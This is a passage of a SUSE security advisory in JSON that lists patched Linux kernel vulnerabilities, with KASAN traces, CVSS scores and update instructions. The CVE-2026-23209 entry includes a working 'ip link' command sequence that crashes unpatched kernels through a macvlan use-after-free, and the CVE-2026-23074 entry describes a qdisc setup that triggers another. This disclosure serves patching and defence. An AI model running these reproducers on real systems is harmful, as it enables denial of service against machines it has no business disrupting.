"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2026-22999"
},
{
"cve": "CVE-2026-23001",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23001"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmacvlan: fix possible UAF in macvlan_forward_source()\n\nAdd RCU protection on (struct macvlan_source_entry)-\u003evlan.\n\nWhenever macvlan_hash_del_source() is called, we must clear\nentry-\u003evlan pointer before RCU grace period starts.\n\nThis allows macvlan_forward_source() to skip over\nentries queued for freeing.\n\nNote that macvlan_dev are already RCU protected, as they\nare embedded in a standard netdev (netdev_priv(ndev)).\n\nhttps: //lore.kernel.org/netdev/695fb1e8.050a0220.1c677c.039f.GAE@google.com/T/#u",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23001",
"url": "https://www.suse.com/security/cve/CVE-2026-23001"
},
{
"category": "external",
"summary": "SUSE Bug 1257232 for CVE-2026-23001",
"url": "https://bugzilla.suse.com/1257232"
},
{
"category": "external",
"summary": "SUSE Bug 1257233 for CVE-2026-23001",
"url": "https://bugzilla.suse.com/1257233"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2026-23001"
},
{
"cve": "CVE-2026-23004",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23004"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndst: fix races in rt6_uncached_list_del() and rt_del_uncached_list()\n\nsyzbot was able to crash the kernel in rt6_uncached_list_flush_dev()\nin an interesting way [1]\n\nCrash happens in list_del_init()/INIT_LIST_HEAD() while writing\nlist-\u003eprev, while the prior write on list-\u003enext went well.\n\nstatic inline void INIT_LIST_HEAD(struct list_head *list)\n{\n\tWRITE_ONCE(list-\u003enext, list); // This went well\n\tWRITE_ONCE(list-\u003eprev, list); // Crash, @list has been freed.\n}\n\nIssue here is that rt6_uncached_list_del() did not attempt to lock\nul-\u003elock, as list_empty(\u0026rt-\u003edst.rt_uncached) returned\ntrue because the WRITE_ONCE(list-\u003enext, list) happened on the other CPU.\n\nWe might use list_del_init_careful() and list_empty_careful(),\nor make sure rt6_uncached_list_del() always grabs the spinlock\nwhenever rt-\u003edst.rt_uncached_list has been set.\n\nA similar fix is neeed for IPv4.\n\n[1]\n\n BUG: KASAN: slab-use-after-free in INIT_LIST_HEAD include/linux/list.h:46 [inline]\n BUG: KASAN: slab-use-after-free in list_del_init include/linux/list.h:296 [inline]\n BUG: KASAN: slab-use-after-free in rt6_uncached_list_flush_dev net/ipv6/route.c:191 [inline]\n BUG: KASAN: slab-use-after-free in rt6_disable_ip+0x633/0x730 net/ipv6/route.c:5020\nWrite of size 8 at addr ffff8880294cfa78 by task kworker/u8:14/3450\n\nCPU: 0 UID: 0 PID: 3450 Comm: kworker/u8:14 Tainted: G L syzkaller #0 PREEMPT_{RT,(full)}\nTainted: [L]=SOFTLOCKUP\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025\nWorkqueue: netns cleanup_net\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0xe8/0x150 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:378 [inline]\n print_report+0xca/0x240 mm/kasan/report.c:482\n kasan_report+0x118/0x150 mm/kasan/report.c:595\n INIT_LIST_HEAD include/linux/list.h:46 [inline]\n list_del_init include/linux/list.h:296 [inline]\n rt6_uncached_list_flush_dev net/ipv6/route.c:191 [inline]\n rt6_disable_ip+0x633/0x730 net/ipv6/route.c:5020\n addrconf_ifdown+0x143/0x18a0 net/ipv6/addrconf.c:3853\n addrconf_notify+0x1bc/0x1050 net/ipv6/addrconf.c:-1\n notifier_call_chain+0x19d/0x3a0 kernel/notifier.c:85\n call_netdevice_notifiers_extack net/core/dev.c:2268 [inline]\n call_netdevice_notifiers net/core/dev.c:2282 [inline]\n netif_close_many+0x29c/0x410 net/core/dev.c:1785\n unregister_netdevice_many_notify+0xb50/0x2330 net/core/dev.c:12353\n ops_exit_rtnl_list net/core/net_namespace.c:187 [inline]\n ops_undo_list+0x3dc/0x990 net/core/net_namespace.c:248\n cleanup_net+0x4de/0x7b0 net/core/net_namespace.c:696\n process_one_work kernel/workqueue.c:3257 [inline]\n process_scheduled_works+0xad1/0x1770 kernel/workqueue.c:3340\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3421\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x510/0xa50 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:246\n \u003c/TASK\u003e\n\nAllocated by task 803:\n kasan_save_stack mm/kasan/common.c:57 [inline]\n kasan_save_track+0x3e/0x80 mm/kasan/common.c:78\n unpoison_slab_object mm/kasan/common.c:340 [inline]\n __kasan_slab_alloc+0x6c/0x80 mm/kasan/common.c:366\n kasan_slab_alloc include/linux/kasan.h:253 [inline]\n slab_post_alloc_hook mm/slub.c:4953 [inline]\n slab_alloc_node mm/slub.c:5263 [inline]\n kmem_cache_alloc_noprof+0x18d/0x6c0 mm/slub.c:5270\n dst_alloc+0x105/0x170 net/core/dst.c:89\n ip6_dst_alloc net/ipv6/route.c:342 [inline]\n icmp6_dst_alloc+0x75/0x460 net/ipv6/route.c:3333\n mld_sendpack+0x683/0xe60 net/ipv6/mcast.c:1844\n mld_send_cr net/ipv6/mcast.c:2154 [inline]\n mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693\n process_one_work kernel/workqueue.c:3257 [inline]\n process_scheduled_works+0xad1/0x1770 kernel/workqueue.c:3340\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3421\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x510/0xa50 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entr\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23004",
"url": "https://www.suse.com/security/cve/CVE-2026-23004"
},
{
"category": "external",
"summary": "SUSE Bug 1257231 for CVE-2026-23004",
"url": "https://bugzilla.suse.com/1257231"
},
{
"category": "external",
"summary": "SUSE Bug 1258655 for CVE-2026-23004",
"url": "https://bugzilla.suse.com/1258655"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2026-23004"
},
{
"cve": "CVE-2026-23054",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23054"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: hv_netvsc: reject RSS hash key programming without RX indirection table\n\nRSS configuration requires a valid RX indirection table. When the device\nreports a single receive queue, rndis_filter_device_add() does not\nallocate an indirection table, accepting RSS hash key updates in this\nstate leads to a hang.\n\nFix this by gating netvsc_set_rxfh() on ndc-\u003erx_table_sz and return\n-EOPNOTSUPP when the table is absent. This aligns set_rxfh with the device\ncapabilities and prevents incorrect behavior.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23054",
"url": "https://www.suse.com/security/cve/CVE-2026-23054"
},
{
"category": "external",
"summary": "SUSE Bug 1257732 for CVE-2026-23054",
"url": "https://bugzilla.suse.com/1257732"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2026-23054"
},
{
"cve": "CVE-2026-23060",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23060"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: authencesn - reject too-short AAD (assoclen\u003c8) to match ESP/ESN spec\n\nauthencesn assumes an ESP/ESN-formatted AAD. When assoclen is shorter than\nthe minimum expected length, crypto_authenc_esn_decrypt() can advance past\nthe end of the destination scatterlist and trigger a NULL pointer dereference\nin scatterwalk_map_and_copy(), leading to a kernel panic (DoS).\n\nAdd a minimum AAD length check to fail fast on invalid inputs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23060",
"url": "https://www.suse.com/security/cve/CVE-2026-23060"
},
{
"category": "external",
"summary": "SUSE Bug 1257735 for CVE-2026-23060",
"url": "https://bugzilla.suse.com/1257735"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2026-23060"
},
{
"cve": "CVE-2026-23074",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23074"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: Enforce that teql can only be used as root qdisc\n\nDesign intent of teql is that it is only supposed to be used as root qdisc.\nWe need to check for that constraint.\n\nAlthough not important, I will describe the scenario that unearthed this\nissue for the curious.\n\nGangMin Kim \u003ckm.kim1503@gmail.com\u003e managed to concot a scenario as follows:\n\nROOT qdisc 1:0 (QFQ)\n \u251c\u2500\u2500 class 1:1 (weight=15, lmax=16384) netem with delay 6.4s\n \u2500\u2500 class 1:2 (weight=1, lmax=1514) teql\n\nGangMin sends a packet which is enqueued to 1:1 (netem).\nAny invocation of dequeue by QFQ from this class will not return a packet\nuntil after 6.4s. In the meantime, a second packet is sent and it lands on\n1:2. teql\u0027s enqueue will return success and this will activate class 1:2.\nMain issue is that teql only updates the parent visible qlen (sch-\u003eq.qlen)\nat dequeue. Since QFQ will only call dequeue if peek succeeds (and teql\u0027s\npeek always returns NULL), dequeue will never be called and thus the qlen\nwill remain as 0. With that in mind, when GangMin updates 1:2\u0027s lmax value,\nthe qfq_change_class calls qfq_deact_rm_from_agg. Since the child qdisc\u0027s\nqlen was not incremented, qfq fails to deactivate the class, but still\nfrees its pointers from the aggregate. So when the first packet is\nrescheduled after 6.4 seconds (netem\u0027s delay), a dangling pointer is\naccessed causing GangMin\u0027s causing a UAF.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23074",
"url": "https://www.suse.com/security/cve/CVE-2026-23074"
},
{
"category": "external",
"summary": "SUSE Bug 1257749 for CVE-2026-23074",
"url": "https://bugzilla.suse.com/1257749"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2026-23074"
},
{
"cve": "CVE-2026-23089",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23089"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: usb-audio: Fix use-after-free in snd_usb_mixer_free()\n\nWhen snd_usb_create_mixer() fails, snd_usb_mixer_free() frees\nmixer-\u003eid_elems but the controls already added to the card still\nreference the freed memory. Later when snd_card_register() runs,\nthe OSS mixer layer calls their callbacks and hits a use-after-free read.\n\nCall trace:\n get_ctl_value+0x63f/0x820 sound/usb/mixer.c:411\n get_min_max_with_quirks.isra.0+0x240/0x1f40 sound/usb/mixer.c:1241\n mixer_ctl_feature_info+0x26b/0x490 sound/usb/mixer.c:1381\n snd_mixer_oss_build_test+0x174/0x3a0 sound/core/oss/mixer_oss.c:887\n ...\n snd_card_register+0x4ed/0x6d0 sound/core/init.c:923\n usb_audio_probe+0x5ef/0x2a90 sound/usb/card.c:1025\n\nFix by calling snd_ctl_remove() for all mixer controls before freeing\nid_elems. We save the next pointer first because snd_ctl_remove()\nfrees the current element.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23089",
"url": "https://www.suse.com/security/cve/CVE-2026-23089"
},
{
"category": "external",
"summary": "SUSE Bug 1257790 for CVE-2026-23089",
"url": "https://bugzilla.suse.com/1257790"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2026-23089"
},
{
"cve": "CVE-2026-23191",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23191"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: aloop: Fix racy access at PCM trigger\n\nThe PCM trigger callback of aloop driver tries to check the PCM state\nand stop the stream of the tied substream in the corresponding cable.\nSince both check and stop operations are performed outside the cable\nlock, this may result in UAF when a program attempts to trigger\nfrequently while opening/closing the tied stream, as spotted by\nfuzzers.\n\nFor addressing the UAF, this patch changes two things:\n- It covers the most of code in loopback_check_format() with\n cable-\u003elock spinlock, and add the proper NULL checks. This avoids\n already some racy accesses.\n- In addition, now we try to check the state of the capture PCM stream\n that may be stopped in this function, which was the major pain point\n leading to UAF.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23191",
"url": "https://www.suse.com/security/cve/CVE-2026-23191"
},
{
"category": "external",
"summary": "SUSE Bug 1258395 for CVE-2026-23191",
"url": "https://bugzilla.suse.com/1258395"
},
{
"category": "external",
"summary": "SUSE Bug 1258396 for CVE-2026-23191",
"url": "https://bugzilla.suse.com/1258396"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2026-23191"
},
{
"cve": "CVE-2026-23204",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23204"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: cls_u32: use skb_header_pointer_careful()\n\nskb_header_pointer() does not fully validate negative @offset values.\n\nUse skb_header_pointer_careful() instead.\n\nGangMin Kim provided a report and a repro fooling u32_classify():\n\nBUG: KASAN: slab-out-of-bounds in u32_classify+0x1180/0x11b0\nnet/sched/cls_u32.c:221",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23204",
"url": "https://www.suse.com/security/cve/CVE-2026-23204"
},
{
"category": "external",
"summary": "SUSE Bug 1258340 for CVE-2026-23204",
"url": "https://bugzilla.suse.com/1258340"
},
{
"category": "external",
"summary": "SUSE Bug 1259126 for CVE-2026-23204",
"url": "https://bugzilla.suse.com/1259126"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2026-23204"
},
{
"cve": "CVE-2026-23209",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23209"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmacvlan: fix error recovery in macvlan_common_newlink()\n\nvalis provided a nice repro to crash the kernel:\n\nip link add p1 type veth peer p2\nip link set address 00:00:00:00:00:20 dev p1\nip link set up dev p1\nip link set up dev p2\n\nip link add mv0 link p2 type macvlan mode source\nip link add invalid% link p2 type macvlan mode source macaddr add 00:00:00:00:00:20\n\nping -c1 -I p1 1.2.3.4\n\nHe also gave a very detailed analysis:\n\n\u003cquote valis\u003e\n\nThe issue is triggered when a new macvlan link is created with\nMACVLAN_MODE_SOURCE mode and MACVLAN_MACADDR_ADD (or\nMACVLAN_MACADDR_SET) parameter, lower device already has a macvlan\nport and register_netdevice() called from macvlan_common_newlink()\nfails (e.g. because of the invalid link name).\n\nIn this case macvlan_hash_add_source is called from\nmacvlan_change_sources() / macvlan_common_newlink():\n\nThis adds a reference to vlan to the port\u0027s vlan_source_hash using\nmacvlan_source_entry.\n\nvlan is a pointer to the priv data of the link that is being created.\n\nWhen register_netdevice() fails, the error is returned from\nmacvlan_newlink() to rtnl_newlink_create():\n\n if (ops-\u003enewlink)\n err = ops-\u003enewlink(dev, \u0026params, extack);\n else\n err = register_netdevice(dev);\n if (err \u003c 0) {\n free_netdev(dev);\n goto out;\n }\n\nand free_netdev() is called, causing a kvfree() on the struct\nnet_device that is still referenced in the source entry attached to\nthe lower device\u0027s macvlan port.\n\nNow all packets sent on the macvlan port with a matching source mac\naddress will trigger a use-after-free in macvlan_forward_source().\n\n\u003c/quote valis\u003e\n\nWith all that, my fix is to make sure we call macvlan_flush_sources()\nregardless of @create value whenever \"goto destroy_macvlan_port;\"\npath is taken.\n\nMany thanks to valis for following up on this issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
